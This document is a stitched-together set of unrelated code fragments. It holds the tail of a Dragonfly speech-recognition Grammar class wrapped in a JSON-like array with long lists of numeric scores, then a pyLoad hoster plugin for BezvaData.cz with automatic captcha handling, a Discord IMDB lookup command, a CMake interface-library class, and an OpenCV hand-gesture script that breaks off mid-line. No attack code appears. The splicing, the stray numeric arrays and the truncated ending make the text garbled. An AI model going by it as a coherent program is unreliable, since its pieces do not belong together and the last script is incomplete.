rules = property(lambda self: tuple(self._rules),\n", " doc=\"List of a grammar's rules.\")\n", "\n", " active_rules = property(\n", " lambda self: [r for r in self.rules if r.active],\n", " doc=\"List of a grammar's active rules.\"\n", " )\n", "\n", " lists = property(lambda self: tuple(self._lists),\n", " doc=\"List of a grammar's lists.\")\n", "\n", " loaded = property(lambda self: self._loaded,\n", " doc=\"Whether a grammar is loaded into\"\n", " \" its SR engine or not.\")\n", "\n", " @property\n", " def rule_names(self):\n", " \"\"\"\n", " List of grammar's rule names.\n", " \"\"\"\n", " result = []\n", " for rule in self._rules:\n", " result.append(rule.name)\n", " return result\n", "\n", " def enable(self):\n", " \"\"\"\n", " Enable this grammar so that it is active to receive\n", " recognitions.\n", "\n", " \"\"\"\n", " self._enabled = True\n", "\n", " def disable(self):\n", " \"\"\"\n", " Disable this grammar so that it is not active to\n", " receive recognitions.\n", "\n", " \"\"\"\n", " self._enabled = False\n", "\n", " enabled = property(lambda self: self._enabled,\n", " doc=\"Whether a grammar is active to receive \"\n", " \"recognitions or not.\")\n", "\n", " def set_exclusiveness(self, exclusive):\n", " \"\"\" Set the exclusiveness of this grammar. \"\"\"\n", " self._engine.set_exclusiveness(self, exclusive)\n", "\n", " def set_exclusive(self, exclusive):\n", " \"\"\" Alias of :meth:`set_exclusiveness`. 
\"\"\"\n", " self.set_exclusiveness(exclusive)\n", "\n", " def _set_engine(self, engine):\n", " if self._loaded:\n", " raise GrammarError(\" Grammar %s: Cannot set engine while \"\n", " \"loaded.\" % self)\n", " self._engine = engine\n", "\n", " engine = property(lambda self: self._engine, _set_engine,\n", " doc=\"A grammar's SR engine.\")\n", "\n", " def set_context(self, context):\n", " \"\"\"\n", " Set the context for this grammar, under which it and its rules\n", " will be active and receive recognitions if it is also enabled.\n", "\n", " Use of this method overwrites any previous context.\n", "\n", " Contexts can be modified at any time, but will only be checked\n", " when :meth:`process_begin` is called.\n", "\n", " :param context: context within which to be active. If *None*,\n", " the grammar will always be active.\n", " :type context: Context|None\n", " \"\"\"\n", " if not (isinstance(context, Context) or context is None):\n", " raise TypeError(\"context must be either a Context object or \"\n", " \"None\")\n", " self._context = context\n", "\n", " context = property(lambda self: self._context,\n", " doc=\"A grammar's context, under which it and its \"\n", " \"rules will be active and receive recognitions \"\n", " \"if it is also enabled.\")\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for populating a grammar object instance.\n", "\n", " def add_rule(self, rule):\n", " \"\"\"\n", " Add a rule to this grammar.\n", "\n", " The following rules apply when adding rules into grammars:\n", "\n", " #. Rules **cannot** be added to grammars that are currently loaded.\n", " #. Two or more rules with the same name are **not** allowed.\n", "\n", " .. warning::\n", "\n", " Note that while adding the same ``Rule`` object to more than one\n", " grammar is allowed, it is **not** recommended! This is because\n", " the context and active/enabled states of these rules will not\n", " function correctly if used. 
It is better to use *separate*\n", " ``Rule`` instances for each grammar instead.\n", "\n", " :param rule: Dragonfly rule\n", " :type rule: Rule\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: adding rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type and duplicate rules or rule names.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot add rule while loaded.\")\n", " elif not isinstance(rule, Rule):\n", " raise GrammarError(\"Invalid rule object: %s\" % rule)\n", " elif rule in self._rules:\n", " return\n", " elif rule.imported:\n", " return\n", " elif [True for r in self._rules if r.name == rule.name]:\n", " raise GrammarError(\"Two rules with the same name '%s' not\"\n", " \" allowed.\" % rule.name)\n", " elif rule.grammar is not None and rule.exported:\n", " self._log_load.warning(\"Exported rule %s is already in grammar \"\n", " \"%s, adding it to grammar %s is not \"\n", " \"recommended.\", rule.name,\n", " rule.grammar.name, self._name)\n", "\n", " # Append the rule to this grammar object's internal list.\n", " self._rules.append(rule)\n", " rule.grammar = self\n", "\n", " def remove_rule(self, rule):\n", " \"\"\"\n", " Remove a rule from this grammar.\n", "\n", " Rules **cannot** be removed from grammars that are currently loaded.\n", "\n", " :param rule: Dragonfly rule\n", " :type rule: Rule\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: removing rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot remove rule while loaded.\")\n", " elif not isinstance(rule, Rule):\n", " raise GrammarError(\"Invalid rule object: %s\" % rule)\n", " elif rule not in self._rules:\n", " return\n", "\n", " # Remove the rule from this grammar object's internal list.\n", " self._rules.remove(rule)\n", " rule.grammar = None\n", "\n", " def add_list(self, lst):\n", " \"\"\"\n", " Add a list to this grammar.\n", "\n", " Lists **cannot** be added to grammars 
that are currently loaded.\n", "\n", " :param lst: Dragonfly list\n", " :type lst: ListBase\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: adding list %s.\",\n", " self._name, lst.name)\n", "\n", " # Make sure that the list can be loaded and is not a duplicate.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot add list while loaded.\")\n", " elif not isinstance(lst, ListBase):\n", " raise GrammarError(\"Invalid list object: %s\" % lst)\n", "\n", " for l in self._lists:\n", " if l.name == lst.name:\n", " if l is lst:\n", " # This list was already added previously, so ignore.\n", " return\n", " raise GrammarError(\"Two lists with the same name '%s' not\"\n", " \" allowed.\" % lst.name)\n", "\n", " # Append the list to this grammar object's internal list.\n", " self._lists.append(lst)\n", " lst.grammar = self\n", "\n", " def remove_list(self, lst):\n", " \"\"\"\n", " Remove a list from this grammar.\n", "\n", " Lists **cannot** be removed from grammars that are currently loaded.\n", "\n", " :param lst: Dragonfly list\n", " :type lst: ListBase\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: removing list %s.\",\n", " self._name, lst.name)\n", "\n", " # Check for correct type.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot remove list while loaded.\")\n", " elif not isinstance(lst, ListBase):\n", " raise GrammarError(\"Invalid list object: %s\" % lst)\n", " elif lst.name not in [l.name for l in self._lists]:\n", " return\n", "\n", " # Remove the list from this grammar object's internal list.\n", " self._lists.remove(lst)\n", " lst.grammar = None\n", "\n", " def add_dependency(self, dep):\n", " \"\"\"\n", " Add a rule or list dependency to this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " by the user, but instead automatically during\n", " grammar compilation.\n", "\n", " \"\"\"\n", " if isinstance(dep, Rule):\n", " self.add_rule(dep)\n", " elif isinstance(dep, ListBase):\n", " self.add_list(dep)\n", " 
else:\n", " raise GrammarError(\"Unknown dependency type %s.\" % dep)\n", "\n", " def add_all_dependencies(self):\n", " \"\"\"\n", " Iterate through the grammar's rules and add all the necessary dependencies.\n", "\n", " **Internal** This method is called when the grammar is loaded.\n", " \"\"\"\n", " memo = set()\n", " for r in self._rules:\n", " for d in r.dependencies(memo):\n", " self.add_dependency(d)\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for runtime modification of a grammar's contents.\n", "\n", " def activate_rule(self, rule):\n", " \"\"\"\n", " Activate a rule loaded in this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " directly by the user, but instead automatically when\n", " the rule itself is activated by the user.\n", "\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: activating rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type and valid rule instance.\n", " assert self._loaded\n", " assert isinstance(rule, Rule), \\\n", " \"Dragonfly rule objects must be of the type dragonfly.rule.Rule\"\n", " if rule not in self._rules:\n", " raise GrammarError(\"Rule '%s' not loaded in this grammar.\"\n", " % rule.name)\n", " if not rule.exported:\n", " return\n", "\n", " # Activate the given rule.\n", " self._engine.activate_rule(rule, self)\n", "\n", " def deactivate_rule(self, rule):\n", " \"\"\"\n", " Deactivate a rule loaded in this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " directly by the user, but instead automatically when\n", " the rule itself is deactivated by the user.\n", "\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: deactivating rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type and valid rule instance.\n", " assert self._loaded\n", " assert isinstance(rule, Rule), \\\n", " \"Dragonfly rule objects must be of the type dragonfly.rule.Rule\"\n", " if rule 
not in self._rules:\n", " raise GrammarError(\"Rule '%s' not loaded in this grammar.\"\n", " % rule.name)\n", " if not rule.exported:\n", " return\n", "\n", " # Deactivate the given rule.\n", " self._engine.deactivate_rule(rule, self)\n", "\n", " def update_list(self, lst):\n", " \"\"\"\n", " Update a list's content loaded in this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " directly by the user, but instead automatically when\n", " the list itself is modified by the user.\n", "\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: updating list %s.\",\n", " self._name, lst.name)\n", "\n", " # Check for correct type and valid list instance.\n", " # assert self._loaded\n", " if lst not in self._lists:\n", " raise GrammarError(\"List '%s' not loaded in this grammar.\"\n", " % lst.name)\n", " elif [True for w in lst.get_list_items()\n", " if not isinstance(w, string_types)]:\n", " raise GrammarError(\"List '%s' contains objects other than\"\n", " \"strings.\" % lst.name)\n", "\n", " self._engine.update_list(lst, self)\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for registering a grammar object instance in natlink.\n", "\n", " def load(self):\n", " \"\"\" Load this grammar into its SR engine. 
\"\"\"\n", "\n", " self._log_load.debug(\"Grammar %s: loading into engine %s.\",\n", " self._name, self._engine)\n", "\n", " # Prevent loading the same grammar multiple times.\n", " if self._loaded:\n", " return\n", "\n", " self.add_all_dependencies()\n", " self._engine.load_grammar(self)\n", " self._loaded = True\n", " self._in_context = False\n", "\n", " # Update all rules loaded in this grammar.\n", " for rule in self._rules:\n", " # Explicitly compare to False so that uninitialized rules (which\n", " # have active set to None) are activated.\n", " if rule.active is not False:\n", " rule.activate(force=True)\n", " # Update all lists loaded in this grammar.\n", " for lst in self._lists:\n", " # pylint: disable=protected-access\n", " lst._update()\n", "\n", " # self._log_load.warning(self.get_complexity_string())\n", "\n", " def unload(self):\n", " \"\"\" Unload this grammar from its SR engine. \"\"\"\n", "\n", " # Prevent unloading the same grammar multiple times.\n", " if not self._loaded:\n", " return\n", " self._log_load.debug(\"Grammar %s: unloading.\", self._name)\n", "\n", " self._engine.unload_grammar(self)\n", " self._loaded = False\n", " self._in_context = False\n", "\n", " def get_complexity_string(self):\n", " \"\"\"\n", " Build and return a human-readable text giving insight into the\n", " complexity of this grammar.\n", "\n", " \"\"\"\n", " rules_all = self.rules\n", " rules_top = [r for r in self.rules if r.exported]\n", " rules_imp = [r for r in self.rules if r.imported]\n", " elements = []\n", " for rule in rules_all:\n", " elements.extend(self._get_element_list(rule))\n", " text = (\"Grammar: %3d (%3d, %3d) rules, %4d elements (%3d avg) %s\"\n", " % (\n", " len(rules_all), len(rules_top), len(rules_imp),\n", " len(elements), len(elements) / len(rules_all),\n", " self,\n", " )\n", " )\n", " for rule in rules_all:\n", " elements = self._get_element_list(rule)\n", " text += \"\\n Rule: %4d %s\" % (len(elements), rule)\n", " return text\n", "\n", " 
def _get_element_list(self, thing):\n", " if isinstance(thing, Rule):\n", " element = thing.element\n", " else:\n", " element = thing\n", " elements = [element]\n", " for child in element.children:\n", " elements.extend(self._get_element_list(child))\n", " return elements\n", "\n", " # ----------------------------------------------------------------------\n", " # Callback methods for handling utterances and recognitions.\n", "\n", " def process_begin(self, executable, title, handle):\n", " \"\"\"\n", " Start of phrase callback.\n", "\n", " *Usually derived grammar classes override\n", " ``Grammar._process_begin`` instead of this method, because\n", " this method merely wraps that method adding context matching.*\n", "\n", " This method is called when the speech recognition\n", " engine detects that the user has begun to speak a\n", " phrase.\n", "\n", " Arguments:\n", " - *executable* -- the full path to the module whose\n", " window is currently in the foreground.\n", " - *title* -- window title of the foreground window.\n", " - *handle* -- window handle to the foreground window.\n", "\n", " \"\"\"\n", " # pylint: disable=expression-not-assigned\n", "\n", " self._log_begin.debug(\"Grammar %s: detected beginning of \"\n", " \"utterance.\", self._name)\n", " self._log_begin.debug(\"Grammar %s: executable '%s', title '%s'.\",\n", " self._name, executable, title)\n", "\n", " if not self._enabled:\n", " # Grammar is disabled, so deactivate all active rules.\n", " [r.deactivate() for r in self._rules if r.active]\n", "\n", " elif not self._context \\\n", " or self._context.matches(executable, title, handle):\n", " # Grammar is within context.\n", " if not self._in_context:\n", " self._in_context = True\n", " self.enter_context()\n", " self._process_begin(executable, title, handle)\n", " for r in self._rules:\n", " if r.exported and hasattr(r, \"process_begin\"):\n", " r.process_begin(executable, title, handle)\n", "\n", " else:\n", " # Grammar's context doesn't match, 
deactivate active rules.\n", " if self._in_context:\n", " self._in_context = False\n", " self.exit_context()\n", " [r.deactivate() for r in self._rules if r.active]\n", "\n", " self._log_begin.debug(\"Grammar %s: active rules: %s.\",\n", " self._name,\n", " [r.name for r in self._rules if r.active])\n", "\n", " def enter_context(self):\n", " \"\"\"\n", " Enter context callback.\n", "\n", " This method is called when a phrase-start has been\n", " detected. It is only called if this grammar's\n", " context previously did not match but now does\n", " match positively.\n", "\n", " \"\"\"\n", "\n", " def exit_context(self):\n", " \"\"\"\n", " Exit context callback.\n", "\n", " This method is called when a phrase-start has been\n", " detected. It is only called if this grammar's\n", " context previously did match but now doesn't\n", " match positively anymore.\n", "\n", " \"\"\"\n", "\n", " def _process_begin(self, executable, title, handle):\n", " \"\"\"\n", " Start of phrase callback.\n", "\n", " *This usually is the method which should be overridden\n", " to give derived grammar classes custom behavior.*\n", "\n", " This method is called when the speech recognition\n", " engine detects that the user has begun to speak a\n", " phrase. This method is called by the\n", " ``Grammar.process_begin`` method only if this\n", " grammar's context matches positively.\n", "\n", " Arguments:\n", " - *executable* -- the full path to the module whose\n", " window is currently in the foreground.\n", " - *title* -- window title of the foreground window.\n", " - *handle* -- window handle to the foreground window.\n", "\n", " \"\"\"\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0.02857142857142857, 0.02564102564102564, 0.02631578947368421, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0.01818181818181818, 0.017543859649122806, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0 ]
599
0.000441
false
# -*- coding: utf-8 -*- import re from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo class BezvadataCz(SimpleHoster): __name__ = "BezvadataCz" __type__ = "hoster" __version__ = "0.29" __status__ = "testing" __pattern__ = r'http://(?:www\.)?bezvadata\.cz/stahnout/.+' __config__ = [("use_premium", "bool", "Use premium account if available", True)] __description__ = """BezvaData.cz hoster plugin""" __license__ = "GPLv3" __authors__ = [("zoidberg", "zoidberg@mujmail.cz")] NAME_PATTERN = r'<p><b>Soubor: (?P<N>[^<]+)</b></p>' SIZE_PATTERN = r'<li><strong>Velikost:</strong> (?P<S>[^<]+)</li>' OFFLINE_PATTERN = r'<title>BezvaData \| Soubor nenalezen</title>' def setup(self): self.resume_download = True self.multiDL = True def handle_free(self, pyfile): #: Download button m = re.search(r'<a class="stahnoutSoubor".*?href="(.*?)"', self.html) if m is None: self.error(_("Page 1 URL not found")) url = "http://bezvadata.cz%s" % m.group(1) #: Captcha form self.html = self.load(url) self.check_errors() for _i in xrange(5): action, inputs = self.parse_html_form('frm-stahnoutFreeForm') if not inputs: self.error(_("FreeForm")) m = re.search(r'<img src="data:image/png;base64,(.*?)"', self.html) if m is None: self.error(_("Wrong captcha image")) inputs['captcha'] = self.captcha._decrypt(m.group(1).decode('base64'), input_type='png') if '<img src="data:image/png;base64' in self.html: self.captcha.invalid() else: self.captcha.correct() break else: self.fail(_("No valid captcha code entered")) #: Download url self.html = self.load("http://bezvadata.cz%s" % action, post=inputs) self.check_errors() m = re.search(r'<a class="stahnoutSoubor2" href="(.*?)">', self.html) if m is None: self.error(_("Page 2 URL not found")) url = "http://bezvadata.cz%s" % m.group(1) self.log_debug("DL URL %s" % url) #: countdown m = re.search(r'id="countdown">(\d\d):(\d\d)<', self.html) wait_time = (int(m.group(1)) * 60 + int(m.group(2))) if m else 120 self.wait(wait_time, False) 
self.link = url def check_errors(self): if 'images/button-download-disable.png' in self.html: self.wait(5 * 60, 24, _("Download limit reached")) #: Parallel dl limit elif '<div class="infobox' in self.html: self.temp_offline() else: return super(BezvadataCz, self).check_errors() getInfo = create_getInfo(BezvadataCz)
[ "# -*- coding: utf-8 -*-\n", "\n", "import re\n", "\n", "from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo\n", "\n", "\n", "class BezvadataCz(SimpleHoster):\n", " __name__ = \"BezvadataCz\"\n", " __type__ = \"hoster\"\n", " __version__ = \"0.29\"\n", " __status__ = \"testing\"\n", "\n", " __pattern__ = r'http://(?:www\\.)?bezvadata\\.cz/stahnout/.+'\n", " __config__ = [(\"use_premium\", \"bool\", \"Use premium account if available\", True)]\n", "\n", " __description__ = \"\"\"BezvaData.cz hoster plugin\"\"\"\n", " __license__ = \"GPLv3\"\n", " __authors__ = [(\"zoidberg\", \"zoidberg@mujmail.cz\")]\n", "\n", "\n", " NAME_PATTERN = r'<p><b>Soubor: (?P<N>[^<]+)</b></p>'\n", " SIZE_PATTERN = r'<li><strong>Velikost:</strong> (?P<S>[^<]+)</li>'\n", " OFFLINE_PATTERN = r'<title>BezvaData \\| Soubor nenalezen</title>'\n", "\n", "\n", " def setup(self):\n", " self.resume_download = True\n", " self.multiDL = True\n", "\n", "\n", " def handle_free(self, pyfile):\n", " #: Download button\n", " m = re.search(r'<a class=\"stahnoutSoubor\".*?href=\"(.*?)\"', self.html)\n", " if m is None:\n", " self.error(_(\"Page 1 URL not found\"))\n", " url = \"http://bezvadata.cz%s\" % m.group(1)\n", "\n", " #: Captcha form\n", " self.html = self.load(url)\n", " self.check_errors()\n", " for _i in xrange(5):\n", " action, inputs = self.parse_html_form('frm-stahnoutFreeForm')\n", " if not inputs:\n", " self.error(_(\"FreeForm\"))\n", "\n", " m = re.search(r'<img src=\"data:image/png;base64,(.*?)\"', self.html)\n", " if m is None:\n", " self.error(_(\"Wrong captcha image\"))\n", "\n", " inputs['captcha'] = self.captcha._decrypt(m.group(1).decode('base64'), input_type='png')\n", "\n", " if '<img src=\"data:image/png;base64' in self.html:\n", " self.captcha.invalid()\n", " else:\n", " self.captcha.correct()\n", " break\n", " else:\n", " self.fail(_(\"No valid captcha code entered\"))\n", "\n", " #: Download url\n", " self.html = self.load(\"http://bezvadata.cz%s\" % 
action, post=inputs)\n", " self.check_errors()\n", " m = re.search(r'<a class=\"stahnoutSoubor2\" href=\"(.*?)\">', self.html)\n", " if m is None:\n", " self.error(_(\"Page 2 URL not found\"))\n", " url = \"http://bezvadata.cz%s\" % m.group(1)\n", " self.log_debug(\"DL URL %s\" % url)\n", "\n", " #: countdown\n", " m = re.search(r'id=\"countdown\">(\\d\\d):(\\d\\d)<', self.html)\n", " wait_time = (int(m.group(1)) * 60 + int(m.group(2))) if m else 120\n", " self.wait(wait_time, False)\n", "\n", " self.link = url\n", "\n", "\n", " def check_errors(self):\n", " if 'images/button-download-disable.png' in self.html:\n", " self.wait(5 * 60, 24, _(\"Download limit reached\")) #: Parallel dl limit\n", " elif '<div class=\"infobox' in self.html:\n", " self.temp_offline()\n", " else:\n", " return super(BezvadataCz, self).check_errors()\n", "\n", "\n", "getInfo = create_getInfo(BezvadataCz)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0.037037037037037035, 0, 0.03571428571428571, 0, 0, 0.023255813953488372, 0, 0, 0.03333333333333333, 0.016666666666666666, 0, 0, 0.017543859649122806, 0, 0, 0, 0, 0.047619047619047616, 0, 0.02857142857142857, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0 ]
87
0.004103
false
import aiohttp import discord async def imdb(cmd, message, args): if not args: return imdb_imput = ' '.join(args) url = 'http://www.omdbapi.com/?t=' + imdb_imput + '&y=&plot=short&r=json' async with aiohttp.ClientSession() as session: async with session.get(url) as data: request = await data.json() title = request['Title'] rated = request['Rated'] released = request['Released'] runtime = request['Runtime'] genre = request['Genre'] awards = request['Awards'] score = request['Metascore'] rating = request['imdbRating'] language = request['Language'] country = request['Country'] writers = request['Writer'] directors = request['Director'] actors = request['Actors'] plot = request['Plot'] movie_text = ('```\nTitle: ' + title + '\nReleased: ' + released + '\nRated: ' + rated + '\nRuntime: ' + runtime + '\nGenre: ' + genre + '\nCountry: ' + country + '\nLanguage: ' + language + '\nAwards: ' + awards + '\nWriters: ' + writers + '\nDirectors: ' + directors + '\nActors: ' + actors + '\nMetascore: ' + score + '\nIMDB Rating: ' + rating + '```') embed = discord.Embed(color=0x1abc9c) embed.add_field(name='🎥 Movie Details', value=movie_text) embed.add_field(name='📑 Plot', value='```\n' + plot + '\n```') await message.channel.send(None, embed=embed)
[ "import aiohttp\n", "import discord\n", "\n", "\n", "async def imdb(cmd, message, args):\n", " if not args:\n", " return\n", "\n", " imdb_imput = ' '.join(args)\n", " url = 'http://www.omdbapi.com/?t=' + imdb_imput + '&y=&plot=short&r=json'\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(url) as data:\n", " request = await data.json()\n", " title = request['Title']\n", " rated = request['Rated']\n", " released = request['Released']\n", " runtime = request['Runtime']\n", " genre = request['Genre']\n", " awards = request['Awards']\n", " score = request['Metascore']\n", " rating = request['imdbRating']\n", " language = request['Language']\n", " country = request['Country']\n", " writers = request['Writer']\n", " directors = request['Director']\n", " actors = request['Actors']\n", " plot = request['Plot']\n", " movie_text = ('```\\nTitle: ' + title +\n", " '\\nReleased: ' + released +\n", " '\\nRated: ' + rated +\n", " '\\nRuntime: ' + runtime +\n", " '\\nGenre: ' + genre +\n", " '\\nCountry: ' + country +\n", " '\\nLanguage: ' + language +\n", " '\\nAwards: ' + awards +\n", " '\\nWriters: ' + writers +\n", " '\\nDirectors: ' + directors +\n", " '\\nActors: ' + actors +\n", " '\\nMetascore: ' + score +\n", " '\\nIMDB Rating: ' + rating + '```')\n", " embed = discord.Embed(color=0x1abc9c)\n", " embed.add_field(name='🎥 Movie Details', value=movie_text)\n", " embed.add_field(name='📑 Plot', value='```\\n' + plot + '\\n```')\n", " await message.channel.send(None, embed=embed)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
44
0
false
import blackjack.cmake.cmd as cmd from .BaseTarget import BaseTarget class LibTarget_Interface(BaseTarget): """ Represents a CMake Interface Library target An Interface library target does not directly create build output though it may have properties set on it and it may be installed, exported and imported add_library(<name> INTERFACE [IMPORTED [GLOBAL]]) """ def __init__(self, name: str, imported: bool = False, globalimport: bool = False): super().__init__(name) self.Imported = imported """If the library is imported""" self.GlobalImport = globalimport """Global Import""" return def render_body(self): ret = [] ret += ["## Library Target - Interface"] ret += super().render_prefix() tmpopts = "INTERFACE" if self.Imported: tmpopts += " IMPORTED" if self.GlobalImport: tmpopts += " GLOBAL" libcmd = cmd.add_library(self.Name, tmpopts, []) ret += libcmd.render() ret += super().render_body() return ret
[ "import blackjack.cmake.cmd as cmd\n", "from .BaseTarget import BaseTarget\n", "\n", "class LibTarget_Interface(BaseTarget):\n", "\n", " \"\"\"\n", " Represents a CMake Interface Library target\n", " An Interface library target does not directly create build output\n", " though it may have properties set on it and it may be installed, exported and imported\n", "\n", " add_library(<name> INTERFACE [IMPORTED [GLOBAL]])\n", " \"\"\"\n", "\n", " def __init__(self, name: str, imported: bool = False, globalimport: bool = False):\n", " super().__init__(name)\n", " self.Imported = imported\n", " \"\"\"If the library is imported\"\"\"\n", " self.GlobalImport = globalimport\n", " \"\"\"Global Import\"\"\"\n", " return\n", "\n", " def render_body(self):\n", " ret = []\n", " ret += [\"## Library Target - Interface\"]\n", " ret += super().render_prefix()\n", " tmpopts = \"INTERFACE\"\n", " if self.Imported:\n", " tmpopts += \" IMPORTED\"\n", " if self.GlobalImport:\n", " tmpopts += \" GLOBAL\"\n", "\n", " libcmd = cmd.add_library(self.Name, tmpopts, [])\n", " ret += libcmd.render()\n", " ret += super().render_body()\n", " return ret\n" ]
[ 0, 0, 0, 0.02564102564102564, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
35
0.001375
false
import sys #from gameDemo import video #Change the following line sys.path.append('C:\opencv\sources\samples\python2') import numpy as np import cv2 #import video import socket import time import math UDP_IP = "127.0.0.1" UDP_PORT = 5005 print "UDP target IP:", UDP_IP print "UDP target port:", UDP_PORT #print "message:", MESSAGE sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP cap = cv2.VideoCapture(0) _ , initImg = cap.read() while(cap.isOpened()): ret, img = cap.read() #img -= initImg; cv2.rectangle(img,(300,300),(100,100),(0,255,0),0) crop_img = img[100:300, 100:300] grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY) value = (35, 35) blurred = cv2.GaussianBlur(grey, value, 0) _, thresh1 = cv2.threshold(blurred, 63, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU) cv2.imshow('Thresholded', thresh1) _ , contours, hierarchy = cv2.findContours(thresh1.copy(),cv2.RETR_TREE, \ cv2.CHAIN_APPROX_NONE) max_area = -1 for i in range(len(contours)): cnt=contours[i] area = cv2.contourArea(cnt) if(area>max_area): max_area=area ci=i cnt=contours[ci] x,y,w,h = cv2.boundingRect(cnt) cv2.rectangle(crop_img,(x,y),(x+w,y+h),(0,0,255),0) hull = cv2.convexHull(cnt) drawing = np.zeros(crop_img.shape,np.uint8) cv2.drawContours(drawing,[cnt],0,(0,255,0),0) cv2.drawContours(drawing,[hull],0,(0,0,255),0) hull = cv2.convexHull(cnt,returnPoints = False) defects = cv2.convexityDefects(cnt,hull) count_defects = 0 cv2.drawContours(thresh1, contours, -1, (0,255,0), 3) for i in range(defects.shape[0]): s,e,f,d = 